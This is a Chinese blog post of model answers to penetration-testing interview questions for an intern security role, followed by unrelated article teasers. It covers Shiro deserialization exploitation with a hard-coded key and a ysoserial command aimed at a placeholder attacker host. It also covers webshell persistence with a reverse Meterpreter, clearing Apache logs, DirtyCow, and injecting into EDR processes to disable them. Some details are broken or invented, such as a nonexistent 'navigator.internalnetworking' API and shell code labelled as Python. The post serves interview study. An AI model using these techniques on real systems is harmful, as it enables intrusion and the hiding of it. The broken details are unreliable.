2025年渗透测试面试题总结-华顺信安[实习]安全服务工程师(题目+回答)
网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
华顺信安[实习]安全服务工程师
1. 自我介绍
2. 红蓝队经验
3. Shiro漏洞知识体系
4. APP渗透测试方法论
5. Xposed框架与逆向工程
6. 三大漏洞原理与修复
7. 内网XSS后续利用链
8. 目标站渗透流程
9. 系统提权技术栈
10. 进程注入技术
11. 应急响应经验
12. 系统应急操作手册
13. 安全工具使用情况
14. APK逆向能力
15. Python开发水平
16. PHP审计方法论
华顺信安[实习]安全服务工程师
1. 自我介绍 2. 红蓝队经验 3. 关于shiro漏洞了解多少 4. 说说你APP测试的经验 5. xposed用的什么框架,有没有自己写过app解密 6. Xss、SSRF、SQL 产生的原因,修复方案? 7. 如果你Xss打了后台,发现是内网的怎么办 8. 假设给你一个目标站,你要怎么做? 9. linux和windows提权知多少。 10. 会不会进程注入? 11. 做过几次应急? 12. 讲讲windows和linux应急你咋做的 13. 用过没用过我们家的goby和fofa? 14. 会不会apk反编译? 15. 你python水平咋样? 16. 你php怎么审的.1. 自我介绍
网络安全研究员,主攻渗透测试与APT攻防溯源,3年红队作战经验,擅长Web漏洞链构造、内网横向及隐蔽通道设计。持有OSEP、CISSP认证,多次在TSRC、ASRC等平台获高危漏洞奖励,主导过金融、政务领域红蓝对抗演练。
2. 红蓝队经验
- 红队视角:
- 钓鱼链开发:基于Cobalt Strike的HTA宏文档投递,配合DNS隐蔽隧道C2通信。
- 域渗透:利用MS14-068伪造PAC提权,通过BloodHound可视化攻击路径。
- 蓝队实践:
- EDR规则优化:针对Mimikatz的LSASS内存扫描行为部署Sysmon告警(Event ID 10)。
- 日志分析:通过ELK聚合Windows 4624/4625登录事件,识别异常Kerberos票据请求。
3. Shiro漏洞知识体系
- 漏洞核心:AES硬编码密钥(
kPH+bIxk5D2deZiIxcaaaA==)导致反序列化攻击(CVE-2016-4437)。- 实战利用:
python# 生成恶意RememberMe Cookie ysoserial.jar JRMPClient 'attacker_ip:port' > payload openssl enc -aes-128-cbc -K {key_hex} -iv 0 -in payload -out rememberMe- 防御方案:升级Shiro至1.2.5+,自定义
setCipherKey动态密钥,启用Cookie完整性校验。
4. APP渗透测试方法论
- 测试框架:
- 静态分析:Jadx反编译APK,定位硬编码API密钥、SSL Pinning绕过点。
- 动态插桩:Frida Hook
checkServerTrusted方法绕过证书校验。- 典型漏洞:
- 逻辑缺陷:修改APK的
AndroidManifest.xml中android:debuggable="true"进行调试注入。- 数据泄露:通过
/data/data/pkg_name/databases提取未加密SQLite数据。
5. Xposed框架与逆向工程
- 工具链:LSPosed(Android 11+适配) + XposedBridge API,针对SSL库注入实现中间人解密。
- 解密实战:对某金融APP的
libencrypt.so进行IDA Pro逆向,定位JNI_OnLoad函数中的AES-CBC模式密钥硬编码问题。
6. 三大漏洞原理与修复
漏洞类型 成因 修复方案 XSS 未对 <script>等标签过滤CSP头设置 script-src 'self'SSRF 服务端未校验用户输入URL 启用URL白名单校验 + 禁用 file://协议SQLi 拼接SQL语句未参数化 预编译语句(PDO)+ 输入类型强校验
7. 内网XSS后续利用链
- 信息搜集:通过XSS执行
navigator.internalnetworking获取内网IP段。- 代理穿透:注入WebSocket隧道代码,建立
ws://192.168.1.1:8080/proxy转发SOCKS5流量。- 横向扩展:结合浏览器密码管理器提取Saved Credentials攻击域控。
8. 目标站渗透流程
- 指纹识别:Wappalyzer识别CMS版本(如ThinkPHP 5.0.23 RCE)。
- 入口突破:FUZZ目录发现
/admin/login弱口令(admin/admin123)。- 权限维持:上传
.user.ini隐藏Webshell,定时任务反弹Meterpreter。- 痕迹清理:删除Apache日志
/var/log/apache2/access.log中攻击IP记录。
9. 系统提权技术栈
- Windows提权:
- 服务漏洞:ScManager数据库修改服务BINARY_PATH(AccessChk.exe 提权)。
- 令牌窃取:利用Incognito模仿SYSTEM进程令牌(需SeDebugPrivilege)。
- Linux提权:
- SUID滥用:
find / -perm -4000 2>/dev/null查找可利用程序(如vim、find)。- 内核漏洞:DirtyCow(CVE-2016-5195)覆盖/etc/passwd实现root持久化。
10. 进程注入技术
- DLL注入:通过CreateRemoteThread将恶意DLL加载至explorer.exe 内存。
- APC注入:QueueUserAPC强制目标线程执行Shellcode,绕过部分AV检测。
- 实战案例:对某EDR进程注入卸载模块,临时禁用其监控功能。
11. 应急响应经验
参与过6次大型应急,包含勒索病毒(GlobeImposter变种)处置、APT组织WebShell溯源。平均响应时间低于2小时,依托Velociraptor实现自动化取证。
12. 系统应急操作手册
- Windows应急:
- 内存取证:Dump LSASS进程排查Mimikatz痕迹(procdump.exe )。
- 注册表分析:
HKLM\SYSTEM\CurrentControlSet\Services查找异常服务项。- Linux应急:
- 进程排查:
lsof -p $PID定位恶意进程文件路径。- Rootkit检测:使用rkhunter扫描隐藏内核模块。
13. 安全工具使用情况
- Goby应用:联动Xray扫描器自动识别Weblogic未授权(CVE-2020-14882)。
- FOFA技巧:
app="Apache-Shiro" && country="CN"快速定位Shiro资产。
14. APK逆向能力
- 工具链:Jadx-GUI静态分析 + Frida动态脱壳(针对某加固厂商的DexClassLoader加载机制)。
- 案例:某社交APP的HMAC签名算法逆向,构造批量注册脚本。
15. Python开发水平
- 自动化开发:基于MitmProxy实现流量重放测试工具,支持JS混淆破解。
- 漏洞利用:编写JWT爆破脚本(PyJWT库 + 多线程字典攻击)。
- 项目地址:GitHub开源多个红队工具(Star数500+)。
16. PHP审计方法论
- 危险函数追踪:全局搜索
eval()、system()等敏感函数调用链。- 反序列化漏洞:审计
unserialize()参数是否可控,寻找POP链构造点。- 框架安全:检查Laravel的
.env配置泄露或未开启CSRF保护。- 实战案例:发现某CMS的
$_GET['type']直接拼接SQL语句导致报错注入。
相关文章:
2025年渗透测试面试题总结-华顺信安[实习]安全服务工程师(题目+回答)
网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。 目录 华顺信安[实习]安全服务工程师 1. 自我介绍 2. 红蓝队经验 3. Shiro漏洞知识体系 4. APP渗透测试方法…...
脚本开发介绍)
按键精灵ios/安卓辅助工具高级函数OcrEx文字识别(增强版)脚本开发介绍
函数名称 OcrEx文字识别(增强版) 函数功能 返回指定区域内所有识别到的字符串、左上角坐标、区域宽高、可信度,无需自制字库,识别范围越小,效率越高,结果越准确 注意:安卓版按键APP需在设置…...
Unity3D HUD UI性能优化方案
前言 在Unity3D中实现高性能的HUD UI需要综合考虑渲染效率、CPU开销和内存管理。以下是分步的优化方案: 对惹,这里有一个游戏开发交流小组,大家可以点击进来一起交流一下开发经验呀! 1. 降低Draw Call:合批与图集 …...
掌握Git:版本控制与高效协作指南
一、初始Git 提出问题:无论是在工作还是学习,我们在编写各种文档的时候,更改失误,失误后恢复到原来版本,不得不复制出一个副本。 每个版本由各自的内容,但最终只有一个报告需要被我们使用。 但在此之前的…...
VsCode和AI的前端使用体验:分别使用了Copilot、通义灵码、iflyCode和Trae
1、前言 大杂烩~每次开发一行代码,各个AI争先恐后抢着提供帮助 备注:四款插件都需要先去官网注册账号,安装好之后有个账号验证。 2、插件详解 2.1、AI分析的答案 GitHub Copilot 定位:老牌 AI 代码补全工具,深度集成…...
交叉熵损失函数,KL散度, Focal loss
目录 交叉熵损失函数(Cross-Entropy Loss) 二分类交叉熵 多分类交叉熵 KL散度(Kullback-Leibler Divergence) 交叉熵损失函数和KL散度总结 Focal loss Focal loss 和 交叉熵损失函数 的区别 交叉熵损失函数(Cross-Entropy…...
php、laravel框架下如何将一个png图片转化为jpg格式
要在 PHP 的 Laravel 框架下将 PNG 图片转化为 JPG 格式,可以使用两种方法:内置的 GD 库或第三方包 Intervention/image。 方法 1:使用 GD 库 GD 库是 PHP 内置的图像处理工具,无需额外安装即可使用。 实现步骤: 使…...
足式机器人经典控制常用的ROS库介绍
一. 核心工具 & 功能 1. ros-noetic-rosbash 作用: 提供与 ROS 相关的 Shell 命令(如 roscd, rosls, roscp 等),用于快速操作 ROS 包、节点和文件。 典型场景: 快速在终端中切换 ROS 工作空间、查看或复制 ROS 包内的文件。 2. ros-noet…...
在tp6模版中加减法
实际项目中,我们经常需要标签变量加减运算的操作。但是,在ThinkPHP中,并不支持模板变量直接运算的操作。幸运的是,它提供了自定义函数的方法,我们可以利用自定义函数解决:ThinkPHP模板自定义函数语法如下&a…...
【Part 3 Unity VR眼镜端播放器开发与优化】第一节|基于Unity的360°全景视频播放实现方案
《VR 360全景视频开发》专栏 将带你深入探索从全景视频制作到Unity眼镜端应用开发的全流程技术。专栏内容涵盖安卓原生VR播放器开发、Unity VR视频渲染与手势交互、360全景视频制作与优化,以及高分辨率视频性能优化等实战技巧。 📝 希望通过这个专栏&am…...
Python打卡DAY30
知识点回顾: 导入官方库的三种手段导入自定义库/模块的方式导入库/模块的核心逻辑:找到根目录(python解释器的目录和终端的目录不一致) # 直接导入 from random import randint print(randint(1, 10)) # 导入自定义库 import modu…...
IDEA连接github(上传项目)
【前提:菜鸟学习的记录过程,如果有不足之处,还请各位大佬大神们指教(感谢)】 1.先配置好git环境。 没配置的小伙伴可以看上一篇文章教程。 安装git,2.49.0版本-CSDN博客 2.在idea设置git 打开IDEA设置-…...
重构研发效能:项目管理引领软件工厂迈向智能化
1.项目管理智能化,激活软件工厂新引擎 在高速发展的软件开发时代,企业如何高效管理多个项目、协调团队合作、优化资源配置,已成为推动技术进步的关键。尤其是在多任务、多项目并行的复杂环境下,智能项目组合管理工具正成为软件工…...
基于 STM32 单片机的实验室多参数安全监测系统设计与实现
一、系统总体设计 本系统以 STM32F103C8T6 单片机为核心,集成温湿度监测、烟雾检测、气体泄漏报警、人体移动监测等功能模块,通过 OLED 显示屏实时显示数据,并支持 Wi-Fi 远程传输。系统可对实验室异常环境参数(如高温、烟雾、燃气泄漏)及非法入侵实时报警,保障实验室安…...
Vue3 中使用 provide/inject 实现跨层级组件传值失败的原因及解决方案
1、基础用法 父组件: <script setup> import { ref, provide } from vue; import ChildComponent from ./ChildComponent.vue; const parentData ref(初始数据); // 提供数据 provide(parentData, parentData); </script>子组件: <sc…...
小白的进阶之路系列之二----人工智能从初步到精通pytorch中分类神经网络问题详解
什么是分类问题? 分类问题涉及到预测某物是一种还是另一种。 例如,你可能想要: 问题类型具体内容例子二元分类目标可以是两个选项之一,例如yes或no根据健康参数预测某人是否患有心脏病。多类分类目标可以是两个以上选项之一判断一张照片是食物、人还是狗。多标签分类目标…...
Semaphore解决高并发场景下的有限资源的并发访问问题
在高并发编程的领域中,我们常常面临着对有限资源的激烈抢夺问题。而 Java 的 java.util.concurrent 包提供的 Semaphore ,为我们提供了精准控制对有限资源并发访问的强大能力。 一、Semaphore? Semaphore,直译为 “信号量”&#…...
Vue3——Pinia
目录 什么是 Pinia? 为什么选择 Pinia? 基本使用 安装pinia 配置pinia 定义store 使用 持久化插件 什么是 Pinia? Pinia 是一个轻量级的状态管理库,专为 Vue 3 设计。它提供了类似 Vuex 的功能,但 API 更加简…...
02 基本介绍及Pod基础排错
01 yaml文件里的字段错误 # 多打了一个i导致的报错 [rootmaster01 yaml]# cat 01-pod.yaml apiVersion: v1 kind: Pod metadata:name: likexy spec:contaiiners:- name: aaaimage: registry.cn-hangzhou.aliyuncs.com/yinzhengjie-k8s/apps:v1 [rootmaster01 yaml]# kubectl …...
Android Edge-to-Edge
Android Edge-to-Edge显示:开发者综合指南 一、什么是Android Edge-to-Edge Android Edge-to-Edge是一种先进的用户界面(UI)设计理念,旨在最大化利用设备的显示区域。它允许应用程序的内容延伸至屏幕的各个边缘,包…...
⼆叉搜索树详解
1. ⼆叉搜索树的概念 ⼆叉搜索树⼜称⼆叉排序树,它或者是⼀棵空树,或者是具有以下性质的⼆叉树: • 若它的左⼦树不为空,则左⼦树上所有结点的值都⼩于等于根结点的值 • 若它的右⼦树不为空,则右⼦树上所有结点的值都⼤于等于根结…...
如何使用通义灵码提高前端开发效率
工欲善其事,必先利其器。对于前端开发而言,使用VSCode已经能够极大地提高前端的开发效率了。但有了AI加持后,前端开发的效率又更上一层楼了! 本文采用的AI是通义灵码插件提供的通义千问大模型,是目前AI性能榜第一梯队…...
使用 ARCore 和 Kotlin 开发 Android 增强现实应用入门指南
环境准备 1. 工具与设备要求 Android Studio:Arctic Fox 或更高版本设备:支持 ARCore 的 Android 设备(查看支持列表)依赖库:// build.gradle (Module级) dependencies {implementation com.google.ar:core:1.35.0im…...
Android Studio Kotlin 中的方法添加灰色参数提示
在使用 Android Studio 时, 我发现使用 Java 编写方法后在调用方法时, 会自动显示灰色的参数。 但在 Kotlin 中没有显示, 于是找了各种方法最后找到了设置, 并且以本文章记录下来。 博主博客 https://blog.uso6.comhttps://blog.…...
TCP协议简介
TCP 协议 TCP(Transmission Control Protocol,传输控制协议)是互联网协议套件中的核心协议之一,位于传输层。它提供了一种可靠的、面向连接的、基于字节流的数据传输服务。TCP 的主要特点是确保数据在传输过程中不丢失、不重复&a…...
Linux学习心得问题整理(二)
day05 Linux基础入门 Linux语法解析 如何理解ssh远程连接?如何使用ssh使用远程连接服务? ssh进也称远程服务终端,常见连接方式可以包括windows和Linux两种方式 首先咱们使用windows窗口进行连接,这里就采用xshell连接工具来给大家做演示吧…...
SOC-ESP32S3部分:2-2-VSCode进行编译烧录
飞书文档https://x509p6c8to.feishu.cn/wiki/CTzVw8p4LiaetykurbTciA42nBf?fromScenespaceOverview 无论是使用Window搭建IDF开发环境,还是使用Linux Ubuntu搭建IDF开发环境,我们都建议使用VSCode进行代码编写和编译,VSCode界面友好&#x…...
数据可视化热图工具:Python实现CSV/XLS导入与EXE打包
在数据分析工作中,热图(Heatmap)是一种非常直观的可视化工具,能够清晰展示数据矩阵中的数值分布和相关性。本文将介绍如何使用Python构建一个支持CSV/XLS文件导入、热图生成并可打包为EXE的桌面应用程序。 核心功能设计 我们的热图工具将包含以下核心功能: 支持CSV和Excel…...
Python虚拟环境再PyCharm中自由切换使用方法
Python开发中的环境隔离是必不可少的步骤,通过使用虚拟环境可以有效地管理不同项目间的依赖,避免包冲突和环境污染。虚拟环境是Python官方提供的一种独立运行环境,每个项目可以拥有自己单独的环境,不同项目之间的环境互不影响。在日常开发中,结合PyCharm这样强大的IDE进行…...
使用 Terraform 创建 Azure Databricks 工作区
使用 Terraform 创建 Azure Databricks Terraform 是一种基础设施即代码(IaC)工具,允许用户通过声明式配置文件来管理和部署云资源。Azure Databricks 是一个基于 Apache Spark 的分析平台,专为数据工程和数据科学设计。通过 Terraform,可以自动化 Azure Databricks 的创…...